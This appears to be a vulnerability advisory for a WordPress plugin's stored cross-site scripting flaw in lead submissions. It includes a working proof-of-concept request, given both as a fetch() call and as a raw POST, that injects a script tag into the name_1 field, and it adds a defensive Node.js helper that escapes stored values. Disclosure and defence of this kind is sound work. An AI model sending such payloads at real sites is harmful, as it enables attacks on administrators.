The plugin does not sanitise and escape some lead values, which could allow unauthenticated users to perform Cross-Site Scripting attacks against a logged-in admin viewing the inserted Leads.
    fetch("https://example.com/wp-admin/admin-ajax.php", {
      "headers": {
        "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
      },
      "body": "name_1=%3Cscript%3Ealert(/XSS/)%3B%3C%2Fscript%3E&email_2=aa%40bb.cc&number_3=434323232&message_4=x&hidden_field=1&action=Save_Form_Data",
      "method": "POST",
    });

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Accept: */*
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-type: application/x-www-form-urlencoded; charset=UTF-8
    Content-Length: 136
    Connection: close

    name_1=%3Cscript%3Ealert(/XSS/)%3B%3C%2Fscript%3E&email_2=aa%40bb.cc&number_3=434323232&message_4=x&hidden_field=1&action=Save_Form_Data

The XSS will be triggered when viewing the Leads at https://example.com/wp-admin/admin.php?page=all-form-leads
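An added example, not part of the original advisory and not the plugin's code: a Node.js triage helper that decodes a captured `Save_Form_Data` body, flags fields carrying markup, and shows each value as it should be HTML-escaped when the Leads page renders it. The function names are hypothetical; the sample body is the one from the request above.

```javascript
// Added example (hypothetical helper names, not the plugin's code).
// Body taken from the request shown in the advisory.
const SAMPLE_BODY =
  "name_1=%3Cscript%3Ealert(/XSS/)%3B%3C%2Fscript%3E&email_2=aa%40bb.cc" +
  "&number_3=434323232&message_4=x&hidden_field=1&action=Save_Form_Data";

const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

// Escape a stored lead value for an HTML text or quoted-attribute context.
// Escaping at output time is what keeps a stored value from running as script.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Decode an application/x-www-form-urlencoded body into [field, value] pairs.
function parseLeadBody(body) {
  return [...new URLSearchParams(body).entries()];
}

// For a Save_Form_Data submission, return every field whose decoded value
// contains angle brackets, together with its escaped form.
// Other actions are ignored and yield an empty list.
function flagLeadFields(body) {
  const pairs = parseLeadBody(body);
  const action = pairs.find(([field]) => field === "action");
  if (!action || action[1] !== "Save_Form_Data") return [];
  return pairs
    .filter(([field, value]) => field !== "action" && /[<>]/.test(value))
    .map(([field, value]) => ({ field, value, escaped: escapeHtml(value) }));
}

for (const hit of flagLeadFields(SAMPLE_BODY)) {
  console.log(`${hit.field}: ${hit.value}  ->  ${hit.escaped}`);
}
```

The angle-bracket check is only a triage heuristic for logs or stored leads; escaping on output is the control that neutralises the value.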
Krzysztof Zając
Yes
2021-11-29 (about 1 year ago)
2022-04-10 (about 9 months ago)